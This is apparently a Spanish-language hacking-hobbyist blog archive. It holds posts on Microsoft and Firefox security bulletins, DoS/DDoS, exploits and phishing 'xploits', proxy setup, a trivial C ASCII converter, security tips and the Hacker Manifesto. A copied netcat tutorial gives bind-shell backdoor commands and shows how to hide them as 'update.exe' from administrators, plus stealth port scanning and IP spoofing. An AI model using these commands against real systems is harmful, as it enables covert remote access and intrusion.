MS10-010: Actualización destinada a corregir una vulnerabilidad en Windows Server 2008 Hyper-V, que podría permitir provocar una denegación de servicio si un usuario ejecuta una secuencia especial de instrucciones con formato incorrecto en una de las máquinas virtuales invitadas que hospede el servidor Hyper-V.
MS10-011: Actualización destinada a solucionar una vulnerabilidad elevación de privilegios a través del subsistema de tiempo de ejecución de cliente-servidor de Windows (Client/Server Run-time Subsystem, CSRSS). Esta vulnerabilidad fue reportada por Matthew "j00ru" Jurczyk y Gynvael Coldwind, de Hispasec.
MS10-012: En este boletín se ofrece una actualización para resolver cuatro vulnerabilidades en el servidor SMB, la más grave de ellas podría permitir la ejecución remota de código si un atacante envía a un sistema afectado un paquete SMB especialmente diseñado. Afecta a Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 y Windows 7.
MS10-014: En este boletín se corrige una vulnerabilidad de denegación de servicio en las implementaciones de Kerberos.
MS10-015: Esta actualización de seguridad resuelve dos vulnerabilidades en el kernel de Windows. Afecta a Windows 2000, Windows XP, Windows Server 2003, Windows Vista y Windows Server 2008

Por último, la vulnerabilidad considerada como "moderada":

MS10-005: Actualización publicada para evitar una vulnerabilidad de ejecución remota de código en Microsoft Paint si un usuario visualiza con este programa un archivo JPEG especialmente manipulado. Afecta a Microsoft Windows 2000, Windows XP y Windows Server 2003.

Las actualizaciones publicadas pueden descargarse a través de Windows Update o consultando los boletines de Microsoft donde se incluyen las direcciones de descarga directa de cada parche. Dada la gravedad de las vulnerabilidades se recomienda la actualización de los sistemas con la mayor brevedad posible.

Fuente: HispaSec & CPH

Bueno, me decidi me voi a cambiar a Linux, ya que Win BUG me tiene arto, siempre fallos de seguridad, y toda la bola... nos vemos Bill

Ataque DoS y DDoS

2010-02-10T11:32:00.000-08:00

Bueno, para entender que es un ataque DDoS, primero debemos saber que es un ataque DoS.

¿Que es un ataque DoS ?

Bueno, un servidor (ya sea una web o un blog) esta preparado para soportar un numero de conexiones simultaneas. Cuando excede el numero de estas conexiones pueden llegar a pasar dos cosas:

1) Que no responda a mas peticiones entrantes

2) Que se desconecte de la red (queda offline)

Entonces si un ordenador, malintencionado, solicita un numero de peticiones mayores a las que soporta nuestro servidor puede llegar a saturar los puertos y provocar que este deje de funcionar correctamente. Este es el ataque DoS (Denial of service) que se traduce como denegacion de servicio

Como se aprecia en la imagen el ordenador atacante satura al ordenador victima (consumiendo sus recursos) y asi

queda imposibilitado un ordenador comun para acceder a la web.

Los recursos que se consumen son acho de banda, memoria ram, etc

Tambien puede pasar que el ataque sea tan excesivo (consuma demasiados recursos) que el administrador de la web

la desconecte de internet hasta que haya pasado el ataque o hasta que lo haya logrado repeler.

En la imagen, el servidor se esta desconectando de internet (no acepta ninguna conexion) entonces el DoS falla.

¿Como se puede prevenir este ataque?

Bloqueando la Ip desde la web ( del atacante claro)

Ataque DDoS:

Cuando el ataque se realiza desde un solo ordenador, es facil de bloquear, se detecta la IP y se bloquea y listo

pero existe una variante de el ataque DoS que es cuando se ataca al servidor de distintos ordenadores distribuidos en

diferentes puntos del mundo. Este ataque DDos (distribute denial of service) Denegacion de servicio distribuida

es una ampliacion del DoS

Este tipo de ataque se lleva a cabo con ordenadores zombie, que son ordenadores comunes controlados por un software o

troyano (por una tercera persona) que permite manipularlos. De esta forma es posible coordinar un ataque de miles

de ordenadores contra una web.

¿Como defendernos de un DDoS?

si tienes un hosting compartido (como puede ser webcindario.com, etc), sera el host que se tendra que defender y no tu.

ya que no tendras acceso al servidor atacado. Pero en cambio si te encuentras en un servidor dedicado/virtual

(que sea tuyo completamente), tendras que recurrir a diversas herramientas complejas no aptas para usuarios con

escasos conocimientos en esta area.

Para recurrir a estas herramientas puede ingresar a

http://foro.portalhacker.net

http://foro.el-hacker.com

http://foro.elhacker.net

No dejo herramientas para realizar DDoS, esto en el mundo Hacker, se considera muy lammer e inapropiado ya que

haces gastar mucho tiempo a los administradores y aveces pueden llegar a perder el trabajo de 5 dias..

Aprende y construye no destruyas

PD: Ya sos conciente de lo que podes causar no lo hagan

Test de Vulnerabilidades

2010-02-04T03:00:00.000-08:00

Hola, navegando por la red, me encontre con este sitio http://secunia.com/vulnerability_scanning/online, la funcion de este, es mostrar vulnerabilidades de programas que poseas en tu ordenador. Lo copado es que te pone el link de descarga de Actualizaciones y parches para el sistema operativo y para los programas vulnerables

Esto, se ejecuta gracias a un navegador a traves de Java

Creo que esta claro el como usar esta web y todo pero por las dudas dejo una screen

¿Que es una vulnerabilidad?

2010-02-03T10:14:00.000-08:00

Hola, despues de mucho tiempo de vacaciones, volvi a este facsinante mundo Under

espero que no me hayan extrañado (mucho) :P

Bueno, ahora con ustedes el tema mas o uno de los mas importantes en el mundo del Hacking

Los Bugs y Exploits

pero primero:

¿Que es un Vulnerabilidad?

La mejor palabra que podríamos usar para definir a una vulnerabilidad es debilidad. Sin duda, una vulnerabilidad hace que la seguridad se vea disminuida o, en algunos casos, que se vea nula. Es por ello que es correcto afirmar el concepto de debilidad.

Realmente hay un gran debate sobre esta terminología, debido a que si nadie conoce el agujero de seguridad, este no existe. Por eso se parte de la hipótesis de que todos los sistemas son inseguros, por la sencilla razón de que lo creo una p

ersona o un grupo de ellas y, por consiguiente, el error siempre esta, solo hace falta descubrirlo.

Tal vez nos preguntemos ¿porque no partir de la hipótesis de que los sistemas son seguros, hasta que se demuestre lo contrario? Es una pregunta interesante que todo el mundo se formula, pero hay un punto muy delicado y que es el argumento propicio para saciar esa intriga: nadie puede poder las manos en el fuego asegurando que el sistema que fabrica es 100% seguro, ya que a la larga se dará cuenta de que no va poder escribir ma

s el código del programa, porque los recursos que utilizaba para crearlo se le quemaron.

Con esta ironía, suponemos que todo sistema tiene una debilidad, desde la mejor caja fuerte hasta una bomba nuclear activada. Todos tienen un método por el cual el sistema de seguridad se desactiva, se evado o se rompe.

Ahora que ya sabemos lo basico, podemos comenza

r co

n lo lindo:

¿Que es un Exploit?

Esta palabra viene el Ingles TO EXPLOIT (explotar)

Exploit se llama a un programa o a parte de un progr

ama malicioso que se trata de aprovechar de alguna vulnerabilidad en la escritura de un programa.

El fin de este puede ser la destruccion o neutralizacion del sistema atacado, aunque en realidad el objetivo principal es conseguir acceso no autorizado al sistema con el fin de usarlo en beneficio propio o para ataques de terceros

Los exploits se caracterizan segun las categorias

de vulnerabilidades utilizadas:

*Vulnerabilidad de desbordamiento de Buffer (buffer overflow)

* Vulnerabilidad de Condicion de Carrera (race condition)

*Vulnerabilidad de error de formato de cadena (Bug string condition)

*Vulnerabilidad de Cross Site Scriptin (XSS)

*Vulnerabilidad de Injeccion SQL (SQLi)

*Vulnerabilidad de Injeccion De Caracteres (CRLF)

*Vulnerabilidad de Denegacion de Servicio

*Vulnerabilidad de Injeccion Multimple de hTML (Multi

ple HTML injection)

¿Que es un XPLOIT?

Fake Mail

Fake Mail, es enviar un correo electronico falseando el remitente se trata de una tecnica usada en ingenieria social para poder obtener el password de la victima

Este es un XPLOIT antiguo de hotmail. Al enviar un mail a la victima y cuando la victima hacia click sobre este la redireccionaba automaticamente al XPLOIT, el cual era una mascara y le pedia los datos (usuario y contraseña), luego de ingresar les mandaba un error y los redireccionaba a la verdadera pagina de hotmail

PD: Este posteo fue sacado de la mejor comunidad Under.. Foro Portal Hacker

http://foro.portalhacker.com

Net Cat (Nuestra herramienta :d)

2009-11-13T11:26:00.000-08:00

Bueno, este tutorial va a ser breve ( y pretendo que sea explicativo para los newbies en el tema )

Bueno primero:

¿Que es NeTcAt?

Segun wikipedia ...

Netcat es una Herramienta de red originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Netcat permite a través de intérprete de comandos y con una sintaxis sencilla abrirPuertos TCP/UDP en un (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a HOST MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos)

Bueno eso (basicamente es netcat)

Ahora Dr [F]

Como lo usamos..?

Bueno sencillo primero lo tenemos que bajar nuestro querido netcat (nc)

ademas, necesitaremos una herramienta llamada Quick Batch Compiler, lo que hara es compilar nuestro programa (lo veremos mas adelante) en modo oculto.

Bueno sin mas preambulo, les dejo nuestro querido NC

http://rapidshare.com/files/308025177/nc.exe.html

Bueno, ahora empezemos, primero, cabe destacar que nuestro netcat, se maneja mediante lineas de comandos (MS DOS)

-i Intervalo de espera, que es la cantidad de tiempo que nc esperará entre dos envíos de datos sucesivos.

-g Se pueden especificar hasta 8 opciones –g en la línea de comandos para forzar que su tráfico nc pase por determinadas direcciones IP.

-G Esta opción le permitirá definir que dirección IP va a ser el siguiente salto dentro de la ruta indicada con la opción –g.

-l Activa el modo escucha de nc.

-L Activa el modo escucha de nc pero con más interés.

-n Indica a nc que no realice ninguna consulta de nombres de hosts.

-o Realiza un volcado hexadecimal de los datos y los almacena en un archivo hexadecimal.

-p Le permite especificar el puerto local que va a utilizar nc.

-r Nc elegirá aleatoriamente los puertos locales y remotos.

-s Especifica la dirección IP de origen que deberá utilizar nc cuando efectue sus conexiones.

-t Es capaz de controlar la negociación de opciones Telnet.

-u Indica a nc que utilice UDP en lugar de TCP.

-v Informa el estado de nc, si pones otra –v podrás obtener más información.

-w Controla cuanto tiempo va a esperar nc antes de dar por terminada una conexión.

-z Le dice a nc que envíe la cantidad de datos necesarias para conocer en que puertos se está escuchando algo

Obtener acceso remoto a una shell

Si se ejecuta el comando nc.exe -l –p4455 –e cmd.exe desde una ventana del símbolo del sistema en una plataforma basada en Windows NT o Windows 2000, cualquiera que realice un Telnet al puerto 4455 de dicha plataforma se encontrará con una shell DOS sin tener que iniciar una sesión en ella.

Bastante elegante, pero también da un poco de miedo. Casi sin esfuerzos acabamos de obtener un indicador de comandos en el sistema atacado. Naturalmente, en los sistemas Windows NT y Windows 2000, tendrá los mismos privilegios y servicios que el usuario que ejecute Netcat. Si creamos de esta manera una puerta trasera en Windows 95 y Windows 98obtendremos un control completo.
Vamos a seguir profundizando en este comando, recuerden que de forma predeterminada Netcat se ejecutará en la ventana DOS que se haya iniciado, este hecho significa que la ventana de control de comandos tendrá que permanecer abierta mientras Netcat se encuentre en ejecución. Emplearemos la opción –d para separarla del indicador de comandos.

C:\>nc.exe –l –p 4455 –d –e cmd.exe

De ésta forma, podremos ocultar una puerta trasera basada en Netcat.

Sin embargo si alguien realiza un Telnet al puerto 4455 y se conecta, tan pronto como se finalice la conexión, Netcat pensará que su trabajo ha terminado y dejará de escuchar. Para evitar esto utilizaremos la opción –L diciéndole a Netcat que escuche con más interés incluso después de haber finalizado la conexión.

C:\>nc.exe –p 4455 –d –L –e cmd.exe

Esto nos permitirá volver al sistema hasta que el administrador de dicho sistema descubra la puerta trasera. Y para evitar que nos descubra podemos cambiar el nombre de nc.exe por cualquier otra cosa. Nota: en este ejemplo yo tengo nc.exe que voy a mover en C: y no en C:\Windows\System32

Cualquiera podrá ignorar algo tan aparentemente inofensivo como update.exe. Otra característica de Netcat es que si lo utilizamos sin ninguna opción en la línea de comandos, nos pedirá que la introduzcamos en la primera línea de la entrada estándar.

EXPLORACION SILENCIOSA DE PUERTOS

Como Netcat puede hablar con un rango de puertos, un uso muy obvio sería utilizarlo como explorador de puertos. La opción –z es la respuesta. Ésta opción le dirá a Netcat que envía una determinada cantidad de datos a algún puerto, pero dicha cantidad solo será suficiente para saber si el puerto está abierto o no. En éste caso utilizaremos la opción –v o –vv ya que sin por lo menos una –v no podremos ver el resultado de la exploración. Aquí estoy haciendo una exploración de puertos a 127.0.0.1 desde el 139 hasta el 145. Obtuve como resultado que solo se encuentran abiertos el 139,141 y 142.

Pero esta forma de hacerlo no es la mas correcta que digamos porque algunas aplicaciones de cortafuegos, bloquearan determinada dirección IP si reciben demasiadas conexiones sobre ella en un periodo muy corto de tiempo. Para que no nos suceda esto Netcat permite hacer exploraciones de una manera más discreta, tan discreta que no parecerá una exploracion de puertos. Se podrá utilizar la opción –i y configurar un intervalo de prueba y la opción –r para lo haga de forma aleatoria. Esto debe quedar de la siguiente forma;

En la instrucción anterior se le dice a Netcat que explore los puertos de la IP 127.0.0.1 desde el 139 hasta el 145 de manera aleatoria, habiendo 10 segundos entre uno y otro. Y Netcat me ha dicho que solo se encuentran abiertos el 139 y el 145.

Puede hacerse este mismo procedimiento para los puertos UDP solo agregándole –u a la línea de comandos.

SUPLANTAR UNA DIRECCION IP

Suplantar una dirección IP resulta sencillo. Los cortafuegos que realizan enmascaramient o o una traducción de las direcciones de red suplantan diariamente direcciones IP. Estos dispositivos toman un paquete desde una dirección IP interna, cambian la dirección IP origen del paquete a su propia dirección IP, lo envían por la red y deshacen las modificaciones cuando vuelven a recibir los datos desde el destino. Por ello, decimos que modificar los contenidos de la dirección IP origen en un paquete IP resulta sencillo. Lo que si es difícil es ser capaz de recibir datos desde una dirección IP suplantada.

Netcat dispone de la opción –s que nos permitirá especificar la dirección IP que deseemos. Cualquiera podria iniciar una exploración de puertos utilizando la opción –s para hacer pensar que estan siendo explorado por Microsoft o el FBI. Sin embargo, el problema nos viene cuando deseamos reenviar las respuestas emitidas por el puerto suplantado a nuestra dirección IP real. Supongamos, por ejemplo, que el host de destino piensa que ha recibido una petición de conexión de Microsoft, intentará enviar un mensaje de reconocimiento a dicha ip de Microsoft. Naturalmente, esta dirección IP no tendrá idea de lo que está hablando el host de destino y enviará un reset. ¿Cómo podemos enviar la información de vuelta a la dirección IP real sin que seamos descubiertos?

En lugar de atacar a la maquina destino, la única otra opción viable es utilizar el encaminamiento dependiente del origen. El encaminamiento dependiente del origen permite a una aplicación de red especificar la ruta que desea seguir para llegar a su destino.

Existen dos tipos de encaminamiento dependiente del origen: estricto y relajado. El encaminamiento dependiente del origen estricto significa que el paquete debe especificar cada salto a realizar en la ruta hasta llegar al host de destino. Algunos routers y otros dispositivos de red siguen permitiendo el encaminamiento dependiente del origen estricto, pero muy pocos permiten el encaminamiento dependiente del origen relajado. El encaminamiento dependiente del origen relajado indica a los routers y a los dispositivos de red que los routers pueden efectuar la mayor parte del encaminamiento hasta llegar al host de destino, este proceso nos permitirá hacer que el paquete pase por nuestra maquina al regresar. Utilizando este método el encaminamiento dependiente del origen puede permitir que suplantemos una direccion IP y que obtengamos las respuestas a su viaje de vuelta. La mayoría de los routers ignoran las opciones del encaminamiento dependiente del origen, pero no todos.

La opción –g de Netcat nos permitirá especificar hasta 8 saltos que deberá dar el paquete antes de llegar a su destino, por ejemplo: nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 10.10.9.50 23 entrará en contacto con el puerto telnet en 10.10.9.50, pero si las opciones del encaminamiento dependiente del origen se encuentran activadas sobre routers intermedios, tráfico se verá forzado a seguir la ruta a través de estas 4 ubicaciones antes de alcanzar su destino. Si intentamos nc –g 10.10.4.5 –g 10.10.5.8 –g 10.10.7.4 –g 10.10.9.9 –G 12 10.10.9.50 23, en este comando estaremos especificando un puntero de salto utilizando la opción –G. La opción –G configurará el puntero de salto al n-simo byte (en este caso el duodecimo) y como las direcciones IP tienen 4 bytes de longitud, el puntero de salto comenzará en 10.10.7.4. Por lo que en su camino a 10.10.9.50, el tráfico necesitará atravesar únicamente las dos ultimas maquinas (porque de acuerdo con el puntero de salto ya hemos estado en las primeras). Sin embargo en el viaje de vuelta el paquete si pasará por las 4 maquinas.

Bueno, este tutorial, fue sacado del foro cph.

Este mismo fue echo por zazu_17

Consejos sobre seguridad Informatica

2009-11-07T04:27:00.000-08:00

Bueno, cansado de que me pregunten " ¿Como hago para que no me entren virus ? ¿Ayudame a prevenir este virus ..."

Les tengo que decir una cosa que les dolera a todos..

La seguridad informatica no existe... Si alguien quiere meterles un virus ( y sabe lo suficiente )
que no les quepa la menor duda que lo haran, si no pregunten a los de defcon :d

Bueno entonces para que se queden un poco mas seguros les dare algunos consejitos basicos par ala seguridad de sus ordenadores

1) Lo primero, sera instalar un AntiVirus, se que esto puede ser comico y que puden estar diciendo es obvio que hay que instalar un antivirus, pero no es poca la gente que se olvida de eso.
Un dato: Los antivirus de hoy se centran mas en la prevencion

2) Un Anti Spywere nunca esta demas a la hora de seguridad informatica, ya que muchas empresas nos espian para ver con que frecuencia entramos a sus Paginas Webs. o cosas asi por el estilo

3) Tener un Anti Malware nunca esta demas ya que como dijimos antes lo antivirus se centran mas en la prevencion que en la desinfeccion...
Si me preguntan "Que anti malware tenes Dr [F]"
Yo tengo solamente 2
El Malware Bytes y EL Dr web...
Los dos son desinfectores de Malware y reparadores de archivos modificados (como puede ser el Host)

4) Recomiendo tambien tener un Firewall o Muro de fuego... este pequeño artefacto bloquea conexiones peligrosas, y algunos evitan escaneos a determinados puertos...
Yo recomiendo el Comodo , el Zone Alarm Pro o el Ashampoo pero esto es subjetivo ya que a cada uno le puede ir diferente...

5) Innore o cierre esas paginas que solicitan cualquier tipo de dato privado, ya sea Nombres, Contraseñas, direcciones, etc..
A esas tecnicas se las denomina Pishing (robar datos ).

6) Es recomendable (aunque yo no lo haga ) cada cierto tiempo algunas copias de seguridad de sus archivos importantes ya que nunca se sabe cuando se puede colar un virus y destruir el Ordenador

7) Si tiene Windows, es recomendable, bajar las actualizaciones de la pagina oficial o llendo a

Inicio ---> Todos Los programas ---> Windows Update ( y ahi sigan los pasos )

8) Mucho cuidado con archivos enviados por correo electronico (adjuntos ) y cuando algun contacto intente enviarte algo por msn...
Si el contacto es conocido tambien duda, ya que hay gusanos que se mandan asi mismos.

9) Prestar especial atencion a archivos descargados de redes peer to peer (P2P)
un ejemplo de red p2p es el Ares, Emule, etc
Los gusanos de ahora aprovechan a replicarse por redes P2P (!!!! Cuidado !!!!!)

10) Estaria bueno que visiten paginas de seguridad informatica para informarse acerca de vulnerabilidades

Todo esto que acabo de decir es mas que obvio que no es obligatorio, si no recomendable para su seguridad en particular

Bueno espero que les haya gustado... Con esto estaran a salvo de cualquier hacker newbie.. xD

Bueno nos vemos.d

Boletines de Seguridad para Mozilla

2009-11-04T01:38:00.002-08:00

Once boletines de seguridad para Mozilla Firefox

La Fundación Mozilla ha publicado once boletines de seguridad para
solucionar diversas vulnerabilidad es en Mozilla Firefox que podrían ser
aprovechadas por un atacante remoto para manipular o revelar información
sensible, saltarse restricciones de seguridad o comprometer un sistema
vulnerable.

A continuación se detallan las vulnerabilidad es publicadas:

El primero de los problemas reside en un error en la forma en la que
Firefox maneja el historial de formularios. Esta vulnerabilidad podría
permitir a un atacante remoto robar los datos guardados y hacer que el
explorador rellene automáticamente los formularios a través de una
página web especialmente manipulada.

Otro error se presenta en la forma en que Firefox nombra a los ficheros
temporales de descarga. Un atacante local podría aprovechar este
problema para ejecutar código arbitrario a través de un cambio del
contenido de los ficheros temporales de descarga.

La creación recursiva de web-workers en JavaScript puede ser empleada
para crear un conjunto de objetos cuya memoria puede ser liberada antes
de su uso. Estas condiciones habitualmente producen una denegación de
servicio, que potencialmente podrían permitir a un atacante la ejecución
de código arbitrario.

Múltiples vulnerabilidad es se deben a la forma en que Firefox procesa
el contenido web incorrecto, un atacante remoto podría provocar una
denegación de servicio y potencialmente ejecutar código arbitrario a
través de una página web especialmente manipulada.

Otro boletín trata un error en el procesador de imágenes GIF de Firefox
que podría causar un desbordamiento de memoria basada en heap. Un
atacante remoto podría aprovechar este problema para causar una
denegación de servicio y potencialmente ejecutar código arbitrario a
través de una imagen GIF especialmente manipulada.

Otro error corregido se presenta en las rutinas de conversión de cadena
a coma flotante de Firefox, que podría provocar un desbordamiento de
memoria basado en heap. Un atacante remoto podría aprovechar este
problema para causar una denegación de servicio y potencialmente
ejecutar código arbitrario con los permisos del usuario a través de una
pagina web con código JavaScrip especialmente manipulado.

Otro boletín se refiere a un error en la forma en que Firefox maneja la
selección de texto. Un atacante remoto podría aprovechar este problema
para ver el texto seleccionado por el usuario desde un dominio diferente
a través de un sitio web especialmente manipulado.

Un error se presenta en la forma en que Firefox muestra el nombre cuando
se descarga un archivo, lo que permitiría mostrar nombres diferentes en
la barra de título y en el cuerpo de dialogo. Un atacante remoto podría
realizar un ataque de hombre en el medio y ejecutar código arbitrario a
través de un fichero especialmente manipulado.

Mozilla también ha actualizado diversas librerías de terceras partes
para corregir fallos en el tratamiento de la memoria y bugs de
estabilidad.

Se recomienda actualizar a Mozilla Firefox versiones 3.5.4 o 3.0.15 :

http://www.mozilla.com/firefox/

PD: Esto no fue publicado por mi :

espero que lo disfruten y descargen las actualizaciones :d

Proxy con navegadores

2009-11-03T11:44:00.000-08:00

Tutorial Proxy en Navegadores...

Primero: ¿Que es un proxy ?

En el contexto de las redes informáticas, el término proxy hace referencia a un programa o dispositivo que realiza una acción en representación de otro. Su finalidad más habitual es la de servidor proxy, que sirve para permitir el acceso a Internet a todos los equipos de una organización cuando sólo se puede disponer de un único equipo conectado, esto es, una única dirección IP.

Wikiipedia

buenas,soy sark,aqui os voy a dejar un tutorial de como ocultar la ip mediante proxy,con los navegadores google chrome,explorer y mozila firefox.

lo primero que vamos a acer es buscar un proxy que funcione desde aqui:

http://www.proxys.com.ar/

Es mas conveniente que el proxy sea de tu pais (para mejor conexiones a internet .. )

cogan las que mas le comvenga o mas cerca esten de ese servidor,para este tutorial e escojido esta:

IP: 212.166.64.12 PUERTO: 3128

bueno,aora nos vamos a nuestro navegador,yo aora lo voy a explicar con google chrome.

nos vamos a:

herramientas > opciones > avanzadas > cambiar la configuracion del proxy.

seleccionamos nuestro acceso a internet i pinchamos encima de el,i nos vamos a configuración.

vamos al apartado de servidor proxy i pinchamos en utilizar proxy para esta conexion.

ponemos en direccion ip que mas nos convenga,es este caso pondremos:

direccion : 212.166.64.12 puerto: 3128 (servidor activo a dia 30-10-2009)

y pulsamos a aceptar,y ya tenemos nuestro proxy listo.

Ahora con navegador mozila firefox.

nos vamos a :

herramientas > opciones > avanzado > red > configuracion

i pinchamos en configuracion manual del proxy.

en proxy HTTP ponemos las que mas nos convenga,(en este caso 212.166.64.12)

y en puerto : 3128 (servidor activo a dia 30-10-2009)

i pinchamos en utilizar proxy para todo (abajo de donde pones el proxy)

y aceptar,y ya tenemos configurado nuestro proxy.

bueno...i por ultimo con explorer.

nos vamos a herramientas > opciones de internet > conexiones

elegimos nuestra conexion a internet i pinchamos en comfiguracion.

vamos al apartado de servidor proxy i pinchamos en utilizar proxy para esta conexion.

ponemos en direccion ip que mas nos convenga,es este caso pondremos:

direccion : 212.166.64.12 puerto: 3128 (servidor activo a dia 30-10-2009)

y pulsamos a aceptar,y ya tenemos nuestro proxy listo.

100% por 100% tutorial creado por sark.

Desencriptador\Encriptador

2009-10-29T16:23:00.000-07:00

Bueno, este code me costo bastante a mi y a un amigo... asi que me molestaria de sobremanera si lo copian y no ponen que fue creado por nosotros.
basicamente lo que hace es
Desencriptar y encriptar archivos
Desencripta
pones numeros y te dice los valores en ACII

y encripta pones letras y te devuelve numeros en ACII

Aca dejo el code fuente de el programita

#include stdio.h
#include stdlib.h
#include conio2.h
int main()
{
system ("color a");
char var[100]; /* Inicio el array char en 100 */
int opcion; /* Hasta char e son variables */
int i, j, cantidad;
int a, b, c, d, e;
gotoxy (17,1);
printf (" Bienvenido al Encriptador/Desencriptador en C:\n ");
printf ("\n\n\n\n");
printf (" 1. Encriptar \n");
printf (" 2. Desencriptar\n\n");
printf (" :::Que deseas hacer::: ");
scanf ("%i",&opcion); /* Escaneo la opcion */
switch (opcion) /* SWITCH */
{
case 1:
printf ("\n Bienvenido al encriptador:\n\n ");
printf (" Ingrese los valores que quiera ver su equivalencia en ASCII:\n\n");
int i; /* Variable que recorrerra el for */
char var[100]; /* Variable */
setbuf(stdin, NULL); /* Vacio el Buffer */
gets(var); /* Devuelvo la vbvariable var */
for(i=0;var[i]!=0;i++) /* Recorro el for */
printf ("\n %c = %i\n", var[i], var[i]);
system ("pause");
break;

// Desencriptador //
case 2:
printf ("\n Bienvenido al desencriptador:\n\n ");
printf (" Cuantas letras tiene su palabra : ");
scanf ("%i", &cantidad); /*Escaneo */
switch (cantidad) /*Switch */
{
case 1:

printf (" Ingrese su numero: \n ");
scanf ("%d", &j); /* Escaneo una sola variable */
printf ("\n %d = %c\n", j, j);
system ("pause");

break;
case 2:
printf (" Ingresa sus numeros :\n ");
scanf ("%d %d", &j, &a); /*Escaneo 2 numeros */
clrscr ();
printf (" %d = %c\n %d = %c\n", j,j,a,a); /* Los imprimo en pantalla */
system ("pause");

case 3:
printf (" Ingresa las 3 secuencias ACII : ");
scanf ("%d %d %d", &j , &a, &c);
clrscr ();
printf (" %i = %c \n %i = %c \n %i = %c\n",j,j,a,a,c,c);
system ("pause");

break;

case 4:
printf (" Ingresa las 4 secuencias ACII : ");
scanf ("%d %d %d %d", &j, &a, &c, &e);
clrscr ();
printf (" %i = %c \n %i = %c \n %i = %c \n %i = %c\n", j,j,a,a,c,c,e,e);
system ("pause");
break;
case 5:
printf (" Ingresa las 5 secuencias ACII:\n "); /* Si se equivoca ingresando opciones */
scanf (" %d %d %d %d %d", &j,&a,&c,&e, &d);
printf (" %i = %c \n %i = %c \n %i = %c \n %i = %c \n %i = %c", j,j,a,a,c,c,e,e,d,d);
system ("pause");

break;

default:
printf ("\nLe erraste de valores man");
system ("pause>null");
} /* Cierro primer swith */
} /* Cierro segundo Switch */
printf ("\n\nEsto es una version beta, | Dr [F] || IZ |");
} /* Cierro main */

Aca tienen algunas imagenes... si no entienden algo solo pregunten

Manifiesto Hacker By The Mentor

2009-10-28T02:25:00.000-07:00

“The Mentor” es el apodo de Loyd Blankenship. Un hacker de élite de las BBS norteamericanas, fue miembro de los grupos Legion of Doom, PhoneLine Phantoms, Racketeers y Extasyy Elite. Se convirtió en un mito al escribir el “Manifiesto Hacker“, en 1986, después de haber sido detenido por crear el juego de rol “GURPS Cyberpunk“, que el FBI consideraba un manual de crimen informatico y por pertenecer a Legion of Doom que, junto con sus rivales Masters of Deception, protagonizaron la primera redada del FBI contra los hackers. Actualmente es programador “freelance” de videojuegos y música electrónica.

Manifiesto Hacker escrito por The Mentor el 08 de Enero de 1986 dice:

La Conciencia de un Hacker
Uno más ha sido capturado hoy,
Está en todos los periódicos.
“Joven arrestado en Escándalo de Crimen por Computadora”,
“Hacker arrestado luego de traspasar las barreras de seguridad de un banco …”
Malditos muchachos. Todos son iguales.

Pero tú, en tu sicología de tres partes y tu tecnocerebro de 1950, has alguna vez observado detrás de los ojos de un Hacker?
Alguna vez te has preguntado qué lo mueve, qué fuerzas lo han formado, cuáles lo pudieron haber moldeado?
Soy un Hacker, entra a mi mundo …
El mío es un mundo que comienza en la escuela …
Soy más inteligente que la mayoría de los otros muchachos, esa basura que ellos nos enseñan me aburre …
Malditos subrealizados. Son todos iguales.

Estoy en la preparatoria.
He escuchado a los profesores explicar por decimoquinta vez como reducir una fracción.
Yo lo entiendo.
“No, Srta. Smith, no le voy a mostrar mi trabajo lo hice en mi mente …”
Maldito muchacho. Probablemente se lo copió. Todos son iguales.

Hoy hice un descubrimiento.
Encontré una computadora.
Espera un momento, esto es lo máximo. Esto hace lo que yo le pida. Si comete un error es porque yo me equivoqué.
No porque no le gusto …
O se siente amenazada por mi …
O piensa que soy un engreído …
O no le gusta enseñar y no debería estar aquí …
Maldito muchacho. Todo lo que hace es jugar. Todos son iguales.
Y entonces ocurrió …
una puerta abierta al mundo …
Corriendo a través de las lineas telefónicas
como la heroína a través de las venas de un adicto, se envía un pulso electrónico,
un refugio para las incompetencias del día a día es buscado …
una tabla de salvación es encontrada.
“Este es … este es el lugar a donde pertenezco …”
Los conozco a todos aquí …
aunque nunca los hubiera conocido, o hablado con ellos, o nunca vuelva a escuchar de ellos otra vez …
Los conozco a todos …
Malditos muchachos. Enlazando las lineas telefónicas otra vez.

Todos son iguales …
Apuesta lo que sea a que todos somos iguales …
A nosotros nos han estado dando comida para bebés con cuchara en la escuela, cuando estábamos
hambrientos de carne …
Las migajas de carne que ustedes dejaron escapar estaban masticadas y sin sabor.
Nosotros hemos sido dominados por sádicos, o ignorados por los apáticos.
Los pocos que tienen algo que enseñarnos encontraron alumnos complacientes, pero esos pocos son como gotas de agua en el desierto.

Ahora este es nuestro mundo …
El mundo del electrón y el conmutador, la belleza del baudio.
Nosotros hacemos uso de un servicio que ya existe sin pagar por lo que podría ser barato como el polvo, si
no estuviera en manos de glotones hambrientos de ganancias,
y ustedes nos llaman criminales.
Nosotros exploramos …
y ustedes nos llaman criminales.
Nosotros buscamos detrás del conocimiento …
y ustedes nos llaman criminales.
Nosotros existimos sin color, sin nacionalidad, sin prejuicios religiosos …
y ustedes nos llaman criminales.
Ustedes construyeron bombas atómicas,
ustedes hicieron la guerra,
ustedes asesinaron, engañaron y nos mintieron
y trataron de hacernos creer que era por nuestro bien,
ahora nosotros somos los criminales.

Si, soy un criminal.
Mi crimen es la curiosidad.
Mi crimen es el juzgar a las personas por lo que dicen y piensan,
no por lo que aparentan.
Mi crimen es ser más inteligente, algo por lo cual nunca me olvidarás.
Soy un Hacker, este es mi manifiesto.
Tu podrás detener este esfuerzo individual, pero nunca podrás detenernos a todos …
después de todo, todos somos iguales.

Manifiesto Hacker By The Mentor

NetWorking Basico

2009-10-25T18:14:00.000-07:00

Breve Introduccion Al protocolo TCP/IP ( principiantes )

Conceptos Previos:

Bit: Unidad minima de almacenamiento, solo puede tener 2 valores.
ceros y unos (0,1)

Protocolo: Es un lenguaje común para que los ordenadores o las partes de una red puedan comunicarse entre si técnicamente, los lenguajes de comunicaciones se llaman "protocolos", y en una misma red pueden convivir distintos tipos de protocolos.

-----------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------
